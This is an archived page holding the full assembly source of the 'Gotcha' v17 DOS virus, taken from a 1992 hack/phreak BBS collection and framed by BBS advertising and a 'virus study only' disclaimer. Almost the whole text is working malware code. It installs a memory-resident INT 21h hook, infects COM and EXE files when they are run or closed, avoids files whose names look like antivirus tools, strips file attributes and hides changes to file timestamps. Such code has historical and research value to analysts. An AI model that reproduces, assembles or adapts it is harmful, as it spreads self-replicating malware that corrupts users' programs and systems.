home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / SOURCE.ZIP / GOTCHA17.ASM < prev    next >
Assembly Source File  |  1992-10-11  |  19KB  |  504 lines

  1. ;****************************************************************************;
  2. ;                                                                            ;
  3. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  4. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  5. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  6. ;                     -=]                            [=-                     ;
  7. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  8. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  9. ;                     -=]                            [=-                     ;
  10. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  11. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  12. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  13. ;                                                                            ;
  14. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  15. ;                                                                            ;
  16. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  17. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  18. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  19. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  20. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  21. ; Is. Keep This Code in Responsible Hands!                                   ;
  22. ;                                                                            ;
  23. ;****************************************************************************;
  24. ;****************************************************************************
  25. ;*  Gotcha    version 17
  26. ;*
  27. ;*  Compile with MASM 4.0
  28. ;*  (other assemblers will probably not produce the same result)
  29. ;*
  30. ;*  Disclaimer:
  31. ;*  This file is only for educational purposes. The author takes no
  32. ;*  responsibility for anything anyone does with this file. Do not
  33. ;*  modify this file!
  34. ;****************************************************************************
  35.  
  36.                 .RADIX  16
  37.  
  38. cseg            segment
  39.                 assume  cs:cseg,ds:cseg,es:nothing
  40.  
  41.  
  42. VERSION         equ     17d
  43. FILELEN         equ     end - start
  44. RESPAR          equ     (FILELEN/16d) + 18d
  45. BUFLEN          equ     18
  46. ENVLEN          equ     signature- envstring        
  47. COMSIGN         equ     0
  48. EXESIGN         equ     1
  49.  
  50.  
  51. ;****************************************************************************
  52. ;*              Dummy program (infected)
  53. ;****************************************************************************
  54.  
  55.                 org     0100
  56.  
  57. begin:          db      0E9, BUFLEN+1, 0        ;jump to virus entry
  58.  
  59.  
  60. ;****************************************************************************
  61. ;*              Data
  62. ;****************************************************************************
  63.  
  64.                 org     0103
  65.  
  66. start:
  67. buffer          db      0CDh, 20                ;original code
  68.                 db      (BUFLEN-2) dup (?)
  69. comexe          db      COMSIGN                 ;dummy program is a COM program
  70.  
  71.  
  72. ;****************************************************************************
  73. ;*              Install the virus
  74. ;****************************************************************************
  75.  
  76.                 call    start2
  77. start2:         pop     si
  78.                 sub     si,(BUFLEN+4)           ;si = begin virus
  79.                 mov     di,0100
  80.                 cld
  81.  
  82.                 cmp     byte ptr cs:[si+BUFLEN],COMSIGN
  83.                 jz      entryC
  84.  
  85. entryE:         mov     ax,ds                   ;calculate CS
  86.                 add     ax,10
  87.                 add     ax,cs:[si+16]
  88.                 push    ax                      ;push new CS on stack
  89.                 push    cs:[si+14]              ;push new IP on stack
  90.                 jmp     short entcheck
  91.  
  92. entryC:         push    cs                      ;push new CS on stack
  93.                 push    di                      ;push new IP on stack
  94.                 push    di
  95.                 push    si
  96.                 movsw                           ;restore old file-begin
  97.                 movsb
  98.                 pop     si
  99.                 pop     di
  100.  
  101. entcheck:       mov     ax,0DADA                ;already installed?
  102.                 int     21
  103.                 cmp     ah,0A5
  104.                 je      entstop
  105.  
  106.                 mov     ax,3000                 ;test DOS version >= 3.1?
  107.                 int     21
  108.                 xchg    ah,al
  109.                 cmp     ax,030A
  110.                 jb      entstop
  111.  
  112.                 push    ds
  113.                 push    es
  114.  
  115.                 mov     ax,ds                   ;adjust memory-size
  116.                 dec     ax
  117.                 mov     ds,ax
  118.                 cmp     byte ptr ds:[0000],5A
  119.                 jnz     cancel
  120.                 mov     ax,ds:[0003]
  121.                 sub     ax,low RESPAR
  122.                 jb      cancel
  123.                 mov     ds:[0003],ax
  124.                 sub     word ptr ds:[0012],low RESPAR
  125.  
  126.                 mov     es,ds:[0012]            ;copy program to top
  127.                 push    cs
  128.                 pop     ds
  129.                 mov     cx,FILELEN
  130.         rep     movsb
  131.  
  132.                 mov     ds,cx                   ;get original int21 vector
  133.                 mov     si,4*21
  134.                 movsw                           ;move it to the end
  135.                 movsw
  136.  
  137.                 push    es                      ;set vector to new handler
  138.                 pop     ds
  139.                 mov     dx,offset ni21-3
  140.                 mov     ax,2521
  141.                 int     21
  142.  
  143. cancel:         pop     es
  144.                 pop     ds
  145.  
  146. entstop:        db      0CBh                    ;retf
  147.  
  148.  
  149. ;****************************************************************************
  150. ;*              Interupt 24 handler
  151. ;****************************************************************************
  152.  
  153. ni24:           mov     al,3
  154.                 iret
  155.  
  156.  
  157. ;****************************************************************************
  158. ;*              Interupt 21 handler
  159. ;****************************************************************************
  160.  
  161. ni21:           pushf
  162.  
  163.                 cmp     ax,0DADA                ;install-check ?
  164.                 je      do_DADA
  165.  
  166.                 push    dx
  167.                 push    cx
  168.                 push    bx
  169.                 push    ax
  170.                 push    si
  171.                 push    di
  172.                 push    ds
  173.                 push    es
  174.  
  175.                 cmp     ah,3E                   ;close ?
  176.                 jne     vvv
  177.                 mov     ah,45                   ;duplicate handle
  178.                 jmp     short doit
  179.  
  180. vvv:            cmp     ax,4B00                 ;execute ?
  181.                 jne     exit
  182.                 mov     ah,3Dh                  ;open the file
  183.  
  184. doit:           int     21
  185.                 jc      exit
  186.                 xchg    ax,bx
  187.                 call    infect
  188.  
  189. exit:           pop     es
  190.                 pop     ds
  191.                 pop     di
  192.                 pop     si
  193.                 pop     ax
  194.                 pop     bx
  195.                 pop     cx
  196.                 pop     dx
  197.                 popf
  198.  
  199. org21:          jmp     dword ptr cs:[oi21-3]   ;call to old int-handler
  200.  
  201.  
  202. do_DADA:        mov     ax,0A500+VERSION        ;return a signature
  203.                 popf
  204.                 iret
  205.  
  206.  
  207. ;****************************************************************************
  208. ;*              Close the file
  209. ;****************************************************************************
  210.  
  211. close:          mov     ah,3E                   ;close the file
  212.                 pushf
  213.                 push    cs
  214.                 call    org21
  215.                 ret
  216.  
  217.  
  218. ;****************************************************************************
  219. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
  220. ;****************************************************************************
  221.  
  222. infect:         cld
  223.  
  224.                 push    bx
  225.                 mov     ah,62                   ;get segment-adres of PSP
  226.                 int     21
  227.                 mov     ds,bx                   ;get seg-adres of environment
  228.                 mov     es,ds:[002C]
  229.                 xor     di,di
  230.                 pop     bx
  231.                 push    cs
  232.                 pop     ds
  233.                 
  234. envloop:        mov     si,offset envstring-3   ;check the environment
  235.                 mov     cx,ENVLEN
  236.         repz    cmpsb
  237.                 jz      close                   ;exit if item found
  238.                 dec     di                      ;goto next item
  239.                 xor     al,al
  240.                 mov     ch,0FF
  241.         repnz   scasb
  242.                 cmp     byte ptr es:[di],0      ;finnished environment?
  243.                 jnz     envloop
  244.  
  245.                 mov     ax,3300                 ;get ctrl-break flag
  246.                 int     21
  247.                 push    dx
  248.  
  249.                 cwd                             ;clear the flag
  250.                 inc     ax
  251.                 push    ax
  252.                 int     21
  253.  
  254.                 mov     dx,bx
  255.                 mov     ax,3524                 ;get int24 vector
  256.                 int     21
  257.                 push    bx
  258.                 push    es
  259.                 mov     bx,dx
  260.  
  261.                 push    cs
  262.                 pop     ds
  263.  
  264.                 mov     dx,offset ni24          ;set int24 vector
  265.                 mov     ah,25
  266.                 push    ax
  267.                 int     21
  268.  
  269.                 mov     ax,1220                 ;get file-table entry
  270.                 push    bx
  271.                 push    ax
  272.                 int     2F
  273.                 mov     bl,es:[di]
  274.                 pop     ax
  275.                 sub     al,0A
  276.                 int     2F
  277.                 pop     bx
  278.  
  279.                 push    es
  280.                 pop     ds
  281.  
  282.                 push    [di+2]                  ;save attribute & open-mode
  283.                 push    [di+4]
  284.  
  285.                 cmp     word ptr [di+28],'XE'   ;check extension
  286.                 jne     not_exe
  287.                 cmp     byte ptr [di+2A],'E'
  288.                 jmp     short check
  289.  
  290. not_exe:        cmp     word ptr [di+28],'OC'
  291.                 jne     close1v
  292.                 cmp     byte ptr [di+2A],'M'
  293. check:          je      check_name
  294. close1v:        jmp     close1
  295.  
  296. check_name:     cmp     byte ptr [di+20],'V'    ;name is V*.* ?
  297.                 je      close1v
  298.                 cmp     byte ptr [di+20],'F'    ;name is F*.* ?
  299.                 je      close1v
  300.  
  301.                 mov     cx,7                    ;name is *SC*.* ?
  302.                 mov     ax,'CS'
  303.                 push    di
  304.                 add     di,21
  305. SCloop:         dec     di
  306.                 scasw
  307.                 loopnz  SCloop
  308.                 pop     di
  309.                 je      close1v
  310.  
  311.                 mov     byte ptr [di+2],2       ;open for read/write
  312.                 mov     byte ptr [di+4],0       ;clear attributes
  313.                 call    getlen
  314.                 mov     cl,3
  315.                 sub     ax,cx                   ;goto signature
  316.                 sbb     dx,0
  317.                 call    goto
  318.                 push    ax                      ;save old offset
  319.                 push    dx
  320.  
  321.                 push    cs
  322.                 pop     ds
  323.  
  324.                 mov     si,0100                 ;read signature
  325.                 mov     dx,si
  326.                 mov     ah,3F
  327.                 int     21
  328.  
  329.                 cmp     word ptr [si],'!A'      ;already infected?
  330.                 je      close2v
  331.  
  332.                 call    gotobegin
  333.  
  334.                 mov     cl,BUFLEN               ;read begin
  335.                 mov     dx,si
  336.                 mov     ah,3F
  337.                 int     21
  338.  
  339.                 cmp     word ptr [si],5A4Dh     ;EXE ?
  340.                 jz      do_EXE
  341.                 cmp     word ptr [si],4D5A
  342.                 jz      do_EXE
  343.  
  344. do_COM:         mov     byte ptr [si+BUFLEN],COMSIGN
  345.  
  346.                 cmp     byte ptr es:[di+12],0FC ;check length
  347.                 jnb     close2
  348.                 cmp     byte ptr es:[di+12],3
  349.                 jbe     close2
  350.  
  351.                 call    writeprog               ;write program to end of file
  352.                 jnz     close2
  353.  
  354.                 mov     byte ptr [si],0E9h      ;JMP xxxx'
  355.                 call    getoldlen
  356.                 add     ax,(BUFLEN-2)
  357.                 mov     word ptr [si+1],ax
  358.  
  359.                 jmp     short done
  360. close2v:        jmp     short close2
  361.  
  362. do_EXE:         mov     byte ptr [si+BUFLEN],EXESIGN
  363.  
  364.                 call    writeprog               ;write program to end of file
  365.                 jnz     close2
  366.  
  367.                 call    getlen                  ;calculate new length 
  368.                 mov     cx,0200                 ;put new length in header
  369.                 div     cx
  370.                 inc     ax
  371.                 mov     word ptr [si+4],ax
  372.                 mov     word ptr [si+2],dx
  373.  
  374.                 call    getoldlen               ;calculate new CS & IP
  375.                 mov     cx,0010
  376.                 div     cx
  377.                 sub     ax,word ptr [si+8]
  378.                 mov     word ptr [si+16],ax     ;put CS in header
  379.                 add     dx,BUFLEN+1
  380.                 mov     word ptr [si+14],dx     ;put IP in header
  381.  
  382.  
  383. done:           call    gotobegin
  384.                 mov     cx,BUFLEN               ;write new begin
  385.                 mov     dx,si
  386.                 mov     ah,40
  387.                 int     21
  388.  
  389. close2:         push    es
  390.                 pop     ds
  391.  
  392.                 pop     dx                      ;restore old offset in file
  393.                 pop     ax
  394.                 call    goto
  395.  
  396.                 or      byte ptr [di+6],40      ;no time-change
  397.  
  398. close1:         call    close
  399.  
  400.                 or      byte ptr [di+5],40      ;no EOF on next close
  401.                 pop     [di+4]                  ;restore attribute & open-mode
  402.                 pop     [di+2]
  403.  
  404.                 pop     ax                      ;restore int24 vector
  405.                 pop     ds
  406.                 pop     dx
  407.                 int     21
  408.  
  409.                 pop     ax                      ;restore ctrl-break flag
  410.                 pop     dx
  411.                 int     21
  412.  
  413.                 ret
  414.  
  415.  
  416. ;****************************************************************************
  417. ;*              Get original length of program
  418. ;****************************************************************************
  419.  
  420. getoldlen:      call    getlen
  421.                 sub     ax,FILELEN
  422.                 sbb     dx,0
  423.                 ret
  424.  
  425.  
  426. ;****************************************************************************
  427. ;*              Get length of program
  428. ;****************************************************************************
  429.  
  430. getlen:         mov     ax,es:[di+11]
  431.                 mov     dx,es:[di+13]
  432.                 ret
  433.  
  434.  
  435. ;****************************************************************************
  436. ;*              Goto new offset DX:AX
  437. ;****************************************************************************
  438.  
  439. gotobegin:      xor     ax,ax
  440.                 cwd
  441. goto:           xchg    ax,es:[di+15]
  442.                 xchg    dx,es:[di+17]
  443.                 ret
  444.  
  445.  
  446. ;****************************************************************************
  447. ;*              Write virus to the file
  448. ;****************************************************************************
  449.  
  450. writeprog:      call    getlen
  451.                 call    goto
  452.  
  453.                 mov     cx,FILELEN              ;write virus
  454.                 mov     dx,si
  455.                 mov     ah,40
  456.                 int     21
  457.                 cmp     cx,ax                   ;are all bytes written?
  458.                 ret
  459.  
  460.  
  461. ;****************************************************************************
  462. ;*              Text and Signature
  463. ;****************************************************************************
  464.  
  465. envstring       db      'E=mc²',0
  466.  
  467. signature:      db      'GOTCHA!',0             ;I have got you!  :-)
  468.  
  469. oi21:
  470. end:
  471.  
  472. cseg            ends
  473.                 end     begin
  474.  
  475. ;****************************************************************************;
  476. ;                                                                            ;
  477. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  478. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  479. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  480. ;                     -=]                            [=-                     ;
  481. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  482. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  483. ;                     -=]                            [=-                     ;
  484. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  485. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  486. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  487. ;                                                                            ;
  488. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  489. ;                                                                            ;
  490. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  491. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  492. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  493. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  494. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  495. ; Is. Keep This Code in Responsible Hands!                                   ;
  496. ;                                                                            ;
  497. ;****************************************************************************;
  498.  
  499. ;─────────────────────────────────────────────────────────────────────────;
  500. ;──────────────────> and Remember Don't Forget to Call <──────────────────;
  501. ;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
  502. ;─────────────────────────────────────────────────────────────────────────;
  503.  
  504.